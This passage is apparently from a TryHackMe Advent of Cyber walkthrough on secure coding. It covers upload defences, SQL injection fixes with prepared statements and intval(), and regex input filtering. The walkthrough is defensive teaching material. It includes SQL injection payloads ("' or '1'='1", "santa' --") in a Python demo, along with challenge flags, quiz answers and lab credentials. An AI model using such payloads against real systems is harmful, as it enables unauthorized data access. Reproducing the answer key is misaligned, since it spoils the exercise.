5. What defence technique can be used to make sure the threat actor cannot recover their file again by simply using the file name?

Even though our uploads are stored outside the web root, an attacker could leverage an additional vulnerability, such as file inclusion, to execute the file.

To counter these attempts, we can look to rename uploaded files to random names, making it almost impossible for an attacker to recover their file by name.

Ans: File renaming

6. What defence technique can be used to make sure malicious files that can hurt elves are not uploaded?

There is still the risk of an attacker uploading a malicious file that targets the elves that will review the CVs. Since Santa is a high-value individual, some nation-states might even use specialized exploits found in PDF readers to upload a malicious PDF in the hopes of getting access to remove themselves from Santa’s naughty list!

In order to combat these types of malicious files, we can scan uploaded files for malware. We can install a package such as ClamAV and use it to scan the contents of each uploaded file.

Ans: Malware Scanning
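
Questions 4 to 6 describe three layers: extension validation, renaming, and malware scanning. As an added example (not from the writeup or the room's PHP application), the Python below puts all three into one upload handler: an extension allow-list backed by a magic-byte check (so a renamed .exe does not pass as a .pdf), a random stored name in a directory outside the web root, and a scanner hook. The scanner here is a hash blocklist standing in for a ClamAV call; the upload directory is a temporary folder and all file contents are constructed.

```python
import hashlib
import os
import secrets
import tempfile

# Allowed extensions and the magic bytes a genuine file of that type must start with.
ALLOWED_TYPES = {".pdf": b"%PDF-"}


class UploadRejected(Exception):
    pass


def validate_upload(filename, data, allowed=ALLOWED_TYPES, max_bytes=5_000_000):
    """Extension allow-list plus a content check, so renaming cv.exe to cv.pdf is not enough."""
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    if ext not in allowed:
        raise UploadRejected(f"extension {ext!r} not allowed")
    if not data.startswith(allowed[ext]):
        raise UploadRejected("content does not match the declared type")
    if len(data) > max_bytes:
        raise UploadRejected("file too large")
    return ext


def hash_blocklist_scanner(blocked_sha256):
    """Stand-in for a ClamAV call: returns scan(data) -> bool that rejects known-bad hashes."""
    def scan(data):
        return hashlib.sha256(data).hexdigest() not in blocked_sha256
    return scan


def store_upload(filename, data, upload_dir, scanner=None):
    """Validate, scan, then write under a random name in a directory outside the web root."""
    ext = validate_upload(filename, data)
    if scanner is not None and not scanner(data):
        raise UploadRejected("malware scanner flagged the file")
    stored_name = secrets.token_hex(16) + ext  # the uploader never learns this name
    with open(os.path.join(upload_dir, stored_name), "wb") as fh:
        fh.write(data)
    return stored_name, hashlib.sha256(data).hexdigest()


def run_demo():
    """Push four constructed uploads through the checks and report what happened to each."""
    upload_dir = tempfile.mkdtemp()  # stands in for a storage path outside the web root
    good_pdf = b"%PDF-1.4\n% constructed minimal pdf\n%%EOF\n"
    fake_pdf = b"MZ\x90\x00 constructed PE header hiding behind a .pdf name"
    known_bad = {hashlib.sha256(good_pdf).hexdigest()}  # pretend this hash is on a blocklist
    attempts = [
        ("exe", "cv-username.exe", fake_pdf, None),
        ("fake_pdf", "cv.pdf", fake_pdf, None),
        ("good_pdf", "cv.pdf", good_pdf, None),
        ("blocked", "cv.pdf", good_pdf, hash_blocklist_scanner(known_bad)),
    ]
    results = {}
    for label, name, data, scanner in attempts:
        try:
            stored_name, _digest = store_upload(name, data, upload_dir, scanner)
            results[label] = "stored as *" + stored_name[-4:]
        except UploadRejected as exc:
            results[label] = f"rejected: {exc}"
    return results


if __name__ == "__main__":
    for label, outcome in run_demo().items():
        print(f"{label}: {outcome}")
```

The order matters: validation and scanning run before anything is written, so a rejected file never touches disk, and the random name means that even a file that slips through cannot be requested back by the name the attacker chose.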

Task 21 [Day 16] Secure Coding | SQLi’s the king, the carolers sing

Learning Objectives

  • Understand what SQL is
  • Learn how to read PHP code
  • How to secure PHP code to prevent SQL injections

To enter the code editor, use the following credentials:

  • Username: coder
  • Password: coder

1. What is the value of Flag1?

Change the query in the elf.php to the given command just by adding the intval() function:

2. What is the value of Flag2?

Fixing SQLi Using Prepared Statements

Every time a search is done, it gets sent to search-toys.php via the q parameter. If you ask the elves to recheck the application right now, Elf Exploit should have a way to take advantage of a vulnerability in that parameter. If we open search-toys.php in our code editor, we can quickly see that a query is built in lines 4-5:

$query="select * from toys where name like '%".$_GET['q']."%' or description like '%".$_GET['q']."%'";
$toys_rs=mysqli_query($db,$query);

If an attacker somehow injects SQL, PHP will blindly concatenate the injected payload into the query string, and the database will execute it.

note: Prepared statements allow you to separate the syntax of your SQL sentence from the actual parameters used on your WHERE clause. Instead of building a single string by concatenation, you will first describe the structure of your SQL query and use placeholders to indicate the position of your query's parameters. You will then bind the parameters to the prepared statement in a separate function call.

So, we use mysqli_prepare() instead of mysqli_query(), bind the search term to both placeholders, and execute the statement:

$query="select * from toys where name like ? or description like ?";
$stmt = mysqli_prepare($db, $query);
$q = "%".$_GET['q']."%"; mysqli_stmt_bind_param($stmt, 'ss', $q, $q);
mysqli_stmt_execute($stmt); $toys_rs = mysqli_stmt_get_result($stmt);

Flag2: THM{KodeNRoll}
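
To make the difference between the two PHP versions concrete, here is the same before/after in Python against an in-memory SQLite database, as an added example (not from the writeup or the room's code). It mirrors the concatenated search from search-toys.php, the prepared-statement fix, the intval() fix from toys.php as an integer cast, and the login query that Flag4 repairs. The tables and rows are constructed; the password is a placeholder.

```python
import sqlite3


def make_db():
    """In-memory SQLite stand-in for the room's MySQL database, filled with constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute("create table toys (id integer primary key, name text, description text)")
    db.executemany(
        "insert into toys (name, description) values (?, ?)",
        [("Train set", "Wooden train with tracks"),
         ("Teddy bear", "Soft brown bear"),
         ("Robot", "Battery powered walking robot")],
    )
    db.execute("create table users (username text, password text)")
    db.execute("insert into users values ('santa', 'constructed-password')")
    return db


def search_toys_vulnerable(db, q):
    """Same construction as the original search-toys.php: q is glued into the SQL text."""
    query = f"select * from toys where name like '%{q}%' or description like '%{q}%'"
    return db.execute(query).fetchall()


def search_toys_fixed(db, q):
    """Prepared statement: the SQL text never changes; the pattern travels as a bound parameter."""
    pattern = f"%{q}%"
    return db.execute(
        "select * from toys where name like ? or description like ?", (pattern, pattern)
    ).fetchall()


def get_toy_by_id(db, raw_id):
    """The toys.php fix: force the id to an integer before it gets anywhere near the query.

    Stricter than PHP's intval(), which would silently keep the leading digits of bad input.
    """
    try:
        toy_id = int(raw_id)
    except (TypeError, ValueError):
        return None
    return db.execute("select * from toys where id=?", (toy_id,)).fetchone()


def login_vulnerable(db, username, password):
    """Login as written before the fix: a quote in the username rewrites the WHERE clause."""
    query = f"select * from users where username='{username}' and password='{password}'"
    return db.execute(query).fetchone() is not None


def login_fixed(db, username, password):
    """Login with placeholders, the counterpart of mysqli_prepare + mysqli_stmt_bind_param."""
    return db.execute(
        "select * from users where username=? and password=?", (username, password)
    ).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    payload = "' or '1'='1"
    print(len(search_toys_vulnerable(db, payload)), "rows from the concatenated query")
    print(len(search_toys_fixed(db, payload)), "rows from the prepared statement")
    print(login_vulnerable(db, "santa' --", "wrong"), login_fixed(db, "santa' --", "wrong"))
```

With the prepared statement the payload is just an odd search term that matches no toy name, and the quote in the username is compared literally rather than parsed as SQL.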

3. What is the value of Flag3?

We also Have to Change the Parameters here on toys.php

$query="select * from toys where id=".intval($_GET['id']);

Flag3: THM{Are we secure yet?}

4. What is the value of Flag4?

Adding the username and password parameters with a placeholder indicated by a question mark (?), and the rest is the same as we did in the 2nd question: we bind the username and password parameters with mysqli_stmt_bind_param and execute the statement.

<?php
require_once("connection.php");
session_start();

if(isset($_POST['username']) && isset($_POST['password'])){
	$username = $_POST['username'];
	$password = $_POST['password'];

	// Placeholders keep the SQL structure fixed; the values are bound separately
	$query="select * from users where username=? and password=?";
	$stmt = mysqli_prepare($db, $query);
	mysqli_stmt_bind_param($stmt, 'ss', $username, $password);
	mysqli_stmt_execute($stmt);
	$users_rs=mysqli_stmt_get_result($stmt);

	if(mysqli_num_rows($users_rs)>0)
	{
		$_SESSION['username']=$username;
		echo "<script>window.location='admin.php';</script>";
	}
	else
	{
		$message="Incorrect username/password found!";
		echo "<script type='text/javascript'>alert('$message');</script>";
	}
}
?>


Flag4: THM{SQLi_who???}

Task 22 [Day 17] Secure Coding | Filtering for Order Amidst Chaos

After handling unrestricted file uploads and SQLi vulnerabilities, one crucial thing remains: validating inputs. For that we use HTML5’s built-in input validation and regex.

HTML5’s built-in features help a lot with the validation of user-provided input, minimizing the need to rely on JavaScript for the same objective.

For even more granular control of the input being provided, regular expressions (regex) can be integrated into the mix. Simply use it in the “pattern” attribute within the <input> element and you’re all set.

Tool used.

  • egrep 'regex_pattern_here' strings (egrep)
  • regex_checker.py (Python script)

Exercise

We are aware that some structured data are more complex than others, so we have set a specific syntax you may follow to make the exercise simpler. Have fun!

  • Filtering for Usernames: Alphanumeric, minimum of 6 characters, maximum of 12 characters, may consist of upper and lower case letters.
  • Filtering for Emails: Follows the form "local-part@domain" (without quotation marks); local-part is a random string, and the domain is in the form of "<domainname>.tld". All top-level domains (tld) are ".com"
  • Filtering for URLs: Starts with either http or https; some of the URLs have "www", and a TLD should exist.

1. Filtering for Usernames: How many usernames fit the syntax above?

egrep '^[a-zA-Z0-9]{6,12}$' strings

Ans: 8

2. Filtering for Usernames: One username consists of a readable word concatenated with a number. What is it?

From above output find username with number

Ans: User35

3. Filtering for Emails: How many emails fit the syntax above?

egrep '.+@.+\.com' strings

Ans: 11

4. Filtering for Emails: How many unique domains are there?

Ans: 8

5. Filtering for Emails: What is the domain of the email with the local-part “lewisham44”?

Ans: amg.com

6. Filtering for Emails: What is the domain of the email with the local-part “maxximax”?

Ans: fedfull.com

7. Filtering for Emails: What is the local-part of the email with the domain name “hotmail.com”?

Ans: hussain.volt

8. Filtering for URLs: How many URLs fit the syntax provided?

egrep '^http(s)?.{3}(www)?.+\..+$'  strings

Ans: 16

9. Filtering for URLs: How many of these URLs start with “https”?

Count it.

Ans: 7
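
The task mentions a regex_checker.py script, so here is the whole exercise done in Python as an added example (not the room's script, and not the room's strings file). It applies the three filters to a constructed list of lines and answers the same kinds of questions: how many lines match each syntax, which usernames carry digits, the unique email domains, the local part for a given domain, and the https count. The email filter is written stricter than the egrep pattern used above, and the looser pattern is kept alongside to show what it over-matches.

```python
import re

# Constructed lines standing in for the room's "strings" file; the real file is not reproduced.
SAMPLE_STRINGS = """\
hussain.volt@hotmail.com
User35
maxximax@fedfull.com
lewisham44@amg.com
short
Abcdefghijklm
validuser
https://www.example.com/index
http://plain.example.org
ftp://not-a-match.example.com
not an email@.com
user@@double.com
Elf123
https://cdn.example.net/files/
""".splitlines()

# Same username pattern as the egrep command above: alphanumeric, 6 to 12 characters.
USERNAME_RE = re.compile(r"^[a-zA-Z0-9]{6,12}$")
# The egrep e-mail pattern, kept for comparison: anything with an @ and a .com somewhere.
LOOSE_EMAIL_RE = re.compile(r".+@.+\.com")
# Tighter reading of the task syntax: exactly one @, no whitespace, domain is <name>.com.
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s.]+\.com$")
# http or https, optional www, at least one dot in the host, optional path.
URL_RE = re.compile(r"^https?://(?:www\.)?[^\s/.]+(?:\.[^\s/.]+)+(?:/\S*)?$")


def filter_lines(lines, pattern):
    return [line for line in lines if pattern.fullmatch(line)]


def loose_email_matches(lines):
    """What the unanchored egrep pattern counts; compare with filter_lines(lines, EMAIL_RE)."""
    return [line for line in lines if LOOSE_EMAIL_RE.search(line)]


def usernames_with_digits(lines):
    return [u for u in filter_lines(lines, USERNAME_RE) if re.search(r"\d", u)]


def email_domains(lines):
    return sorted({line.rsplit("@", 1)[1] for line in filter_lines(lines, EMAIL_RE)})


def local_part_for_domain(lines, domain):
    return [line.rsplit("@", 1)[0] for line in filter_lines(lines, EMAIL_RE)
            if line.endswith("@" + domain)]


def count_https(lines):
    return sum(1 for u in filter_lines(lines, URL_RE) if u.startswith("https://"))


if __name__ == "__main__":
    print("usernames:", filter_lines(SAMPLE_STRINGS, USERNAME_RE))
    print("emails (strict):", len(filter_lines(SAMPLE_STRINGS, EMAIL_RE)),
          "emails (egrep pattern):", len(loose_email_matches(SAMPLE_STRINGS)))
    print("domains:", email_domains(SAMPLE_STRINGS))
    print("urls:", filter_lines(SAMPLE_STRINGS, URL_RE), "https:", count_https(SAMPLE_STRINGS))
```

The line `user@@double.com` is the one that separates the two email patterns: the unanchored `.+@.+\.com` accepts it, the anchored version does not. That is the same reason the task recommends the HTML5 pattern attribute be a full-string match rather than a search.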

Task 23 [Day 18] Sigma | Lumberjack Lenny Learns New Rules
